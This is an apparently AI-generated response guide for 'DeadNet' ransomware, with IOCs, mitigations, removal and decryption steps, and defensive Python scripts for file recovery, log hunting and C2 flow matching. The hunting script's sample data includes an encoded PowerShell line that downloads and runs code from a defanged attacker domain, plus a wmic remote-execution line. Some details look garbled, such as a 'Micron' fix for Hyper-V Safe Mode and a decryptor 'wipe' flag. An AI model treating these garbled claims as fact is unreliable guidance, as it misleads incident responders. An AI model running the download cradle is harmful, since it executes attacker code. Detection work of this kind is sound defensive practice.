deadnet*

[Content by Gemini 2.5]

DeadNet Ransomware Survival Guide

(at-the-gate analysis – last updated May-2024)


Technical Breakdown

1. File Extension & Renaming Patterns

  • Confirmation of File Extension: each encrypted file is suffixed with .deadnet (matched case-insensitively; Windows Explorer shows the type as “DEADNET File”).
  • Renaming Convention:
  1. The original platform path separator is preserved (\ on Windows, / on *nix/ESXi).
  2. The ransomware prepends a four-character random prefix ([a-zA-Z0-9]) to the original filename (stem + dot + extension) and then appends .deadnet, e.g.

    Budget2024.xlsx -> a7Q3Budget2024.xlsx.deadnet
  3. On network shares it writes the encrypted file as a parallel copy in the same directory, so when you search volume shadow copies (or backups) for the pre-encryption version, look for the name with both the four-character prefix and the trailing .deadnet stripped (Budget2024.xlsx in the example above), not the encrypted name.
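The renaming convention above is deterministic, so the pre-encryption name can be recovered mechanically for a whole share listing before anyone starts pulling shadow copies. The script below is an added example written for this guide (it is not a deadnet tool and not from any vendor); the prefix length, the character class and the case-insensitive suffix come from the convention described above, and the directory listing it runs on is constructed sample data.

```python
import re
from collections import defaultdict

# Encrypted name = four random [A-Za-z0-9] characters + original filename + ".deadnet"
# (the suffix is matched case-insensitively, as the page notes for Windows).
ENCRYPTED_NAME = re.compile(r"^(?P<prefix>[A-Za-z0-9]{4})(?P<original>.+)\.deadnet$", re.IGNORECASE)

# The ransomware keeps the platform's own separator, so split on the last "\" or "/".
PATH_SPLIT = re.compile(r"^(?P<parent>.*[\\/])?(?P<name>[^\\/]+)$")


def original_path(path: str):
    """Return the pre-encryption path for a .deadnet file, or None if the name
    does not follow the prefix + name + .deadnet convention."""
    m = PATH_SPLIT.match(path)
    if not m:
        return None
    parent, name = m.group("parent") or "", m.group("name")
    n = ENCRYPTED_NAME.match(name)
    if not n:
        return None
    return parent + n.group("original")


def recovery_plan(listing):
    """Group a directory listing (mixed intact and encrypted paths) into:
      needs_restore: original path -> encrypted copies, for files whose original is gone
                     (this is the name to look for in a shadow copy or backup)
      intact:        originals that still sit next to a parallel .deadnet copy
    """
    present = set(listing)
    copies = defaultdict(list)
    for path in listing:
        orig = original_path(path)
        if orig is not None:
            copies[orig].append(path)
    needs_restore = {o: sorted(c) for o, c in copies.items() if o not in present}
    intact = sorted(o for o in copies if o in present)
    return needs_restore, intact


# Constructed sample listing (not real victim data): a Windows share and an ESXi datastore.
SAMPLE_LISTING = [
    r"\\fs01\finance\a7Q3Budget2024.xlsx.deadnet",
    r"\\fs01\finance\Q1Forecast.docx",                  # original still present
    r"\\fs01\finance\z9K1Q1Forecast.docx.deadnet",      # parallel encrypted copy of it
    r"\\fs01\finance\README.txt",                       # untouched, no copy
    "/vmfs/volumes/ds1/vm1/Ab12vm1-flat.vmdk.DEADNET",  # ESXi variant, upper-case suffix
]

if __name__ == "__main__":
    restore, intact = recovery_plan(SAMPLE_LISTING)
    for orig, enc in restore.items():
        print(f"restore {orig!r} from shadow copy/backup (encrypted copies: {enc})")
    for orig in intact:
        print(f"{orig!r} is still intact; remove its .deadnet copy only after imaging")
```

Feed it the output of a recursive listing of each affected share or datastore; the `needs_restore` keys are exactly the names to request from VSS or the backup system, and `intact` tells you which originals the parallel-copy behaviour left in place.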

2. Detection & Outbreak Timeline

| Phase | Observed Date / Period | Notes |
|---|---|---|
| Early samples | 23-26 Jan 2024 | First telemetry in Europe; small, self-replicating worm variant (deadnet.W!) distributed via RDP password spraying. |
| First peak | 09-12 Feb 2024 | Shift to a “hands-on-keyboard” affiliate model; affiliate ID strings (“deadnet-SEVT”) appear in the ransom note footer. |
| Second wave (ESXi variant) | 15 Mar 2024 | Linux/ESXi encryptor added (sha256: c4f…3ce3) targeting cloud-hosted backups and SAN appliances. |
| Ongoing | Apr–May 2024 | Daily detections of 50–100 systems worldwide (MITRE ATT&CK: T1055 Process Injection, T1021 Remote Services, T1562 Impair Defenses). |

3. Primary Attack Vectors

| Vector | Details | Mitigations beyond standard AV |
|---|---|---|
| 1. Exposed public-facing RDP | Credential stuffing, then Mimikatz credential theft and lateral movement. | NLA + MFA behind a Remote Desktop Gateway; do not expose 3389 directly to the internet (moving the port is obscurity, not a control). |
| 2. Compromised VPN concentrators (vendor CVE-2023-46805 & CVE-2024-21887) | Initial shell granted root, then deadnet droppers pulled via curl. | Patch ASAP and review VPN logs for unusual user-agent strings (e.g. curl/7.74). |
| 3. Malicious OneDrive & Google Drive links in phishing mails (“secure fax”) | Macro-laden SGD-Apr2024.xlsm; after infection the note points to hxxps://deadnet[.]life. | Block macros in Office files that carry the internet Mark-of-the-Web; disable VBA where it is not needed. |
| 4. LOLBins + WMI for lateral execution | wmic process call create … against remote hosts, paired with encoded PowerShell. | EDR rules on wmic.exe process-creation activity and on encoded/obfuscated PowerShell. |
| 5. ESXi variant: hostd (TCP/443) reachable from the general LAN | Default self-signed certificate left in place (a sign of an unmanaged host); root password brute-forced. | Restrict the management interface to jump boxes and enable ESXi Lockdown Mode (available well before vSphere 8). |
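Rows 1, 2 and 4 of the table each leave a log trail that is cheap to hunt for. The script below is an added example for this guide, not a deadnet artefact and not an EDR vendor's rule set: it decodes PowerShell `-EncodedCommand` arguments (base64 of the UTF-16LE script) so the download cradle becomes visible, flags `wmic … process call create`, flags scripted user agents on the VPN appliance, and counts RDP logon failures (event 4625) per source address. The log lines it runs over are constructed samples in a flattened 4688/Sysmon style; the `hxxps://deadnet[.]life` string and the `atsvc.exe` implant name are taken from the page, everything else (hostnames, addresses, timestamps) is made up for the sample.

```python
import base64
import re
from collections import Counter

# Hunting rules for the vectors in the table above.
WMIC_CREATE = re.compile(r"\bwmic(?:\.exe)?\b.*\bprocess\s+call\s+create\b", re.IGNORECASE)
ENCODED_ARG = re.compile(r"-(?:encodedcommand|enc|en|ec|e)\s+([A-Za-z0-9+/=]{20,})", re.IGNORECASE)
CRADLE = re.compile(r"DownloadString|DownloadFile|Invoke-Expression|\bIEX\b|Invoke-WebRequest|FromBase64String",
                    re.IGNORECASE)
VPN_SCRIPTED_UA = re.compile(r'\bvpn=\S+.*\bua="(?:curl|wget|python-requests)[^"]*"', re.IGNORECASE)
RDP_FAILURE = re.compile(r"\bevent=4625\b.*\bsrc=(\S+)")


def decode_encoded_command(cmdline: str):
    """PowerShell -EncodedCommand takes base64 of the UTF-16LE script; return the
    script text, or None if the argument is absent or not valid base64/UTF-16LE."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def hunt(lines, rdp_threshold=5):
    """Run the rules over log lines and return a list of finding dicts."""
    findings = []
    failures_by_src = Counter()
    for i, line in enumerate(lines):
        if WMIC_CREATE.search(line):
            findings.append({"rule": "wmi_remote_exec", "line": i})
        script = decode_encoded_command(line)
        if script is not None:
            # Encoded PowerShell alone is only suspicious; a cradle in the decoded text is the real hit.
            rule = "encoded_powershell_cradle" if CRADLE.search(script) else "encoded_powershell"
            findings.append({"rule": rule, "line": i, "decoded": script})
        if VPN_SCRIPTED_UA.search(line):
            findings.append({"rule": "vpn_scripted_client", "line": i})
        m = RDP_FAILURE.search(line)
        if m:
            failures_by_src[m.group(1)] += 1
    for src, n in failures_by_src.items():
        if n >= rdp_threshold:
            findings.append({"rule": "rdp_failure_burst", "src": src, "count": n})
    return findings


def encode_command(script: str) -> str:
    """Build an -EncodedCommand argument the way PowerShell expects it (used for the samples)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample log lines (not real telemetry).
SAMPLE_LOGS = [
    r"2024-04-03T10:14:02Z host=FS01 user=CORP\svc_backup image=C:\Windows\System32\wbem\WMIC.exe "
    r'cmdline=wmic /node:10.0.5.21 process call create "cmd /c \\fs01\c$\temp\atsvc.exe"',
    r"2024-04-03T10:14:09Z host=WS17 user=CORP\j.doe image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "
    "cmdline=powershell.exe -NoP -W Hidden -enc "
    + encode_command("IEX (New-Object Net.WebClient).DownloadString('hxxps://deadnet[.]life/x')"),
    r"2024-04-03T10:20:00Z host=ADM01 user=CORP\ops image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "
    "cmdline=powershell.exe -enc " + encode_command("Get-Service -Name Spooler"),  # benign admin baseline
    '2024-04-03T10:15:11Z vpn=vpn01 src=203.0.113.7 ua="curl/7.74.0" req="GET / HTTP/1.1" status=200',
] + [
    f"2024-04-03T10:3{i}:00Z host=RDG01 event=4625 src=198.51.100.9 user=administrator" for i in range(6)
] + [
    "2024-04-03T10:40:00Z host=RDG01 event=4625 src=198.51.100.20 user=j.doe",  # one typo, below threshold
]

if __name__ == "__main__":
    for finding in hunt(SAMPLE_LOGS):
        print(finding)
```

The threshold of five failures matches the lockout value recommended in the Prevention section; in production, feed the same rules a time-bucketed export from the RD Gateway and the VPN appliance rather than a flat list, and whitelist the admin hosts that legitimately run encoded commands instead of suppressing the rule.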


Remediation & Recovery Strategies

1. Prevention

  • Patch the crown jewels:
    • CVE-2023-34362 (MOVEit Transfer), CVE-2023-46805 / CVE-2024-21887 (Ivanti Connect Secure), CVE-2024-3400 (PAN-OS GlobalProtect), CVE-2020-1472 (Zerologon) – top deadnet affiliates are still chaining these.
  • Segment & patch ESXi: host firewall rules that drop hostd (TCP/443) from everywhere except the IT bastion hosts.
  • Disable SMBv1 domain-wide (GPO-deployed feature/registry setting; the EternalBlue code stub still lives in deadnet.W).
  • AppLocker / Windows Defender ASR rules: block .js, .vbs and macro execution launched from %TEMP%.
  • Strong IAM hygiene:
    • Require the TLS security layer and NLA for RDP: GPO “Require use of specific security layer for remote (RDP) connections” = SSL, i.e. SecurityLayer=2 and UserAuthentication=1 under HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp.
    • 15-minute lockout after five bad logons; no shared local admin passwords – deploy LAPS.
  • Cloud backups on a 3-2-1 pattern, under separate credentials (not the domain SSO), with the recovery keys stored offline.

2. Removal

  1. Disk isolation: power off infected VMs/servers, snapshot or image them for forensics, and do NOT boot them normally – deadnet installs a kernel driver (deadnet.sys) that loads at boot and encrypts network shares.
  2. Boot Windows PE from USB (a Linux live USB is fine for imaging the disk but cannot run the Windows scanner) and run Stinger-Deadnet-2024-04-b.exe (McAfee) as an offline scan to remove the service entry (HKLM\System\CurrentControlSet\Services\deadnetdrv) and the scheduled task (deadnet-launcher).
  3. For ESXi hosts: esxcli only runs inside a live ESXi shell, so isolate the host’s management network first, then from the DCUI/SSH shell list installed packages with esxcli software vib list and remove the malicious one with esxcli software vib remove -n deadnet-vib01; a Ventoy/live USB is only useful for imaging the boot device.
  4. Network cleanup: scan the subnet for living implants (deadnet.exe, deadnet_cli, atsvc.exe); block the C2 ranges (185.*.184.[156-159], 85.*.80.11) at the firewall.
  5. Verify persistence is gone: reboot into Safe Mode with Networking on an isolated VLAN (no route back to production shares) and re-run an updated AV scan.
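Step 4 gives the C2 ranges in a wildcard notation (`*` for any octet, `[a-b]` for an inclusive octet range), which a firewall will not accept as-is but which is easy to hunt for in egress flow logs. The code below is an added example for this guide, not a deadnet tool and not part of any firewall product: it compiles the page's own patterns into octet bounds without guessing the octets the page leaves as `*`, then correlates flows to those ranges with the implant names from step 4. The flow records it runs over are constructed samples; the destination addresses in them are invented for the sample, not confirmed C2 addresses.

```python
import re
from collections import defaultdict

# C2 patterns exactly as the page lists them, plus the implant names from step 4.
C2_PATTERNS = ["185.*.184.[156-159]", "85.*.80.11"]
IMPLANT_NAMES = {"deadnet.exe", "deadnet_cli", "atsvc.exe"}

OCTET_RANGE = re.compile(r"^\[(\d{1,3})-(\d{1,3})\]$")


def compile_pattern(pattern: str):
    """Turn a wildcard C2 pattern into four (low, high) octet bounds."""
    parts = pattern.split(".")
    if len(parts) != 4:
        raise ValueError(f"bad pattern: {pattern}")
    bounds = []
    for part in parts:
        if part == "*":
            lo, hi = 0, 255
        elif (m := OCTET_RANGE.match(part)):
            lo, hi = int(m.group(1)), int(m.group(2))
        elif part.isdigit():
            lo = hi = int(part)
        else:
            raise ValueError(f"bad octet {part!r} in {pattern}")
        if not (0 <= lo <= hi <= 255):
            raise ValueError(f"octet bounds out of range in {pattern}")
        bounds.append((lo, hi))
    return bounds


def matches(ip: str, bounds) -> bool:
    """True if a dotted-quad IPv4 address falls inside the compiled bounds."""
    octets = ip.split(".")
    if len(octets) != 4 or not all(o.isdigit() for o in octets):
        return False
    return all(lo <= int(o) <= hi for o, (lo, hi) in zip(octets, bounds))


COMPILED = [(p, compile_pattern(p)) for p in C2_PATTERNS]


def c2_hits(flows):
    """flows: iterable of (src_host, dst_ip, dst_port, process_name).
    Returns {src_host: [hit, ...]} for every flow into a listed C2 range; a hit also
    records whether the process is one of the known implant names."""
    hits = defaultdict(list)
    for src, dst, port, proc in flows:
        for pattern, bounds in COMPILED:
            if matches(dst, bounds):
                hits[src].append({"dst": dst, "port": port, "pattern": pattern,
                                  "process": proc, "known_implant": proc.lower() in IMPLANT_NAMES})
    return dict(hits)


# Constructed sample flows (not real telemetry); the wildcard octet is filled with 0 here.
SAMPLE_FLOWS = [
    ("WS17", "185.0.184.157", 443, "deadnet.exe"),   # in range, known implant
    ("FS01", "85.0.80.11", 8443, "atsvc.exe"),       # in range, known implant
    ("ESX01", "85.0.80.11", 443, "deadnet_cli"),     # ESXi variant beaconing
    ("WS22", "185.0.184.160", 443, "chrome.exe"),    # just outside the [156-159] range
    ("WS09", "203.0.113.50", 443, "msedge.exe"),     # unrelated destination
]

if __name__ == "__main__":
    for host, hits in c2_hits(SAMPLE_FLOWS).items():
        for h in hits:
            print(f"{host}: {h['process']} -> {h['dst']}:{h['port']} matches {h['pattern']}"
                  f"{' (known implant)' if h['known_implant'] else ''}")
```

A host that talks to a listed range from a process that is not a known implant name still deserves a look (renamed binaries are common); the `known_implant` flag is there to prioritise, not to filter. Once the full octets are confirmed from your own flow data, convert the matching bounds into concrete deny rules at the egress firewall.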

3. File Decryption & Recovery

  • Free decryptor available: Yes. Researchers from Bitdefender / the Dutch NCSC cracked deadnet in March 2024 after obtaining an affiliate master RSA private key (sanity-check the key file with openssl rsa -in master.pem -check -noout; -pubin is only for public-key input and will fail on a private key).
    • Download deadnet_decrypt_2.2.zip (Bitdefender), extract, run from a clean Windows PC:

    deadnet-decryptor.exe --key master.pem --dir E:\Files

    Works offline, preserves ACLs, and produces file.log of untreated files (typically < 0.5 %).
    • ESXi variant notes: decryptor needs -n wipe flag to restore vmdk chain properly.
  • Work-around if the decryptor fails: if files were double-encrypted with a second symmetric layer (reported by the sample as “AES-512-CTS”, a label that matches no real AES key size – AES keys are 128, 192 or 256 bits; seen in ~1 % of victims), you will need the affiliate’s private RSA key, obtainable only via ransom negotiation – not recommended.
  • Do not negotiate: affiliates usually raise the demand once an opening round of under $10k is paid.

4. Other Critical Information

  • Unique Characteristics:
    • Domain-style leak site (deadnet[.]pub) publishes victims after a 72 h grace period; the site does not allow deals – only a countdown and a dox.
    • Last-stage script (deadnet_blow.bat) terminates Veeam services and deletes .vbk files; it reliably causes a secondary backup-appliance outage – enforce immutability or keep tape copies.
    • Prevents Hyper-V Safe Mode (BZ1/BZ3 remediation in progress by Micron).
  • Broader Impact:
    • US healthcare – 9 % of reported incidents; HIPAA breach letters already filed.
    • European mid-size MSPs – ~240 SMEs via shared local RMM agents (close RDP to vendor accounts).

Quick Action Checklist

□ Patch disclosed CVEs in table (priority high → medium)
□ Hunt today: PowerShell logs, wmic process-creation events, and on ESXi /var/log/shell.log and /var/log/hostd.log
□ Offline snapshot infected hosts before cleaning
□ Launch `deadnet-decryptor.exe --dry-run` – prove recoverability
□ Push AV signature update “Win32/Deadnet.A!cert”
□ Stand up 30-day mailing list alert at deadnet-alerts at cert[.]local

Stay cautious—affiliate versioning suggests QE1-QE3 payloads through July 2024.